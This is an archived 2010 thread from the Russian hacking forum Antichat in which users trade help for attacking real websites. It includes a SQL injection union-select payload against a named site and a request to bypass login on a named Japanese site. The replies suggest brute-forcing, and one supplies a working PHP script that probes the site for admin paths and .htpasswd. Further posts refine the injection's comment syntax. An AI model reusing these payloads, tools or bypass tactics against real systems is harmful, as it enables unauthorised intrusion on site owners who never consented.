ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.01.2010, 16:31
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
v1d0qz не имеет значение через что давать БД команды .. пхпмайадмин это всего лишь ГУИ ... поэтому файл если не ошибаюсь если не указываеть полную дерикторию зальётся в папку с Базой ... но в этом я не уверен =)
|
|
|
16.01.2010, 16:34
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
блин все таки вот пришлос в студию линк:
пххп://allbest.ru/union/search.cgi?q=1')%20union+select%201,2+--+
никакие запросы не подходит (( |
|
|
|
16.01.2010, 18:09
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
елемент $_GET['id'] можно взять в {} чтоб запрос выполнялся ...
Iceangel_+ я прав (протестить негде)?
прав, но зачем? ведь но суть вопроса не в этом.
Сообщение от .:[melkiy
:.]MySql вернет ошибку из-за незакрытой кавычки.
бред, что за "незакрытая кавычка"? и в данном случае ошибку mysql_fetch_array возвращает не mysql, а php.
|
|
|
|
16.01.2010, 18:25
|
|
Новичок
Регистрация: 15.01.2010
Сообщений: 1
Провел на форуме:
998
Репутация:
0
|
|
Всем привет,
у меня такой вопрос есть японский сайт http://www.104club.info/
там есть подраздел http://www.104club.info/indicator
но при переходе он требует логин и пароль, кто может подсказать как его обойти?
Заранее спасибо
|
|
|
|
16.01.2010, 18:37
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от guspertiz
Всем привет,
у меня такой вопрос есть японский сайт http://www.104club.info/
там есть подраздел http://www.104club.info/indicator
но при переходе он требует логин и пароль, кто может подсказать как его обойти?
Заранее спасибо
Обойти никак, можно побрутить...
|
|
|
|
17.01.2010, 04:45
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 10
Провел на форуме:
76178
Репутация:
30
|
|
Сообщение от guspertiz
Всем привет,
у меня такой вопрос есть японский сайт http://www.104club.info/
там есть подраздел http://www.104club.info/indicator
но при переходе он требует логин и пароль, кто может подсказать как его обойти?
Заранее спасибо
Обойти можно, как правильно подметил nemaniak, только брутом. Попробуй просканить сайтец на полезные файлы/папки, авось и .htpasswd доступен для чтения  . Может че найдешь.
Лови скриптик на скорую руку
PHP код:
<form action='<?=$_SERVER[PHP_SELF]?>' method='POST'>
<pre>
URL without ending slash!:<a href='#' title='exmpl: http://www.site.com' style='text-decoration: none'>?</a><input type='text' name='host' size='50' /><br/>
File with dirs:<a href='#' title='exmpl: dirs.txt (with Path)' style='text-decoration: none'>?</a> <input type='text' name='dirs' size='50' value='./dirs.txt'/><br/>
<input type='submit' name='gogo' value='Scan' />
</pre>
</form>
<hr/>
<?php
if($_POST['gogo'] && trim($_POST['host']) != '' && trim($_POST['dirs']) != ''){
$host = $_POST['host'];
$dirs = @file($_POST['dirs']);
if (!$dirs) die ('Can`t open file');
foreach ($dirs as $v){
$temp = @get_headers($host.trim($v));
$found = false;
if (preg_match('#200#', $temp[0])) {echo $host.'<b>'.$v.'</b> found! <br/>';}
if (preg_match('#403#', $temp[0])) {echo $host.'<b>'.$v.'</b> is forbidden! <br/>';}
if (preg_match('#404#', $temp[0])) { continue;}
}
} else if ($_POST['gogo'] && (trim($_POST['host']) == '' || trim($_POST['dirs']) == '')) {
die('All fields required');
}
?>
Файл dirs должен быть вот такого вида:
/admin/
/admin.php
/indicator
...
|
|
|
|
16.01.2010, 18:36
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
так что с пххп://allbest.ru/union/search.cgi?q=1')%20union+select%201,2+--+ ничего незяли сделать?
|
|
|
|
17.01.2010, 04:58
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
авось и .htpasswd доступен для чтения
Не несите бред, еще с версий 1.* по дефолту в конфиге апача стоит deny на все .ht* файлы
|
|
|
|
17.01.2010, 05:12
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 10
Провел на форуме:
76178
Репутация:
30
|
|
Сообщение от Spyder
Не несите бред, еще с версий 1.* по дефолту в конфиге апача стоит deny на все .ht* файлы
Извиняюсь, то была шутка.
|
|
|
|
17.01.2010, 14:45
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Для комментирование с помощью -- нужно наличие хотя бы одного пробела после второго тире.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид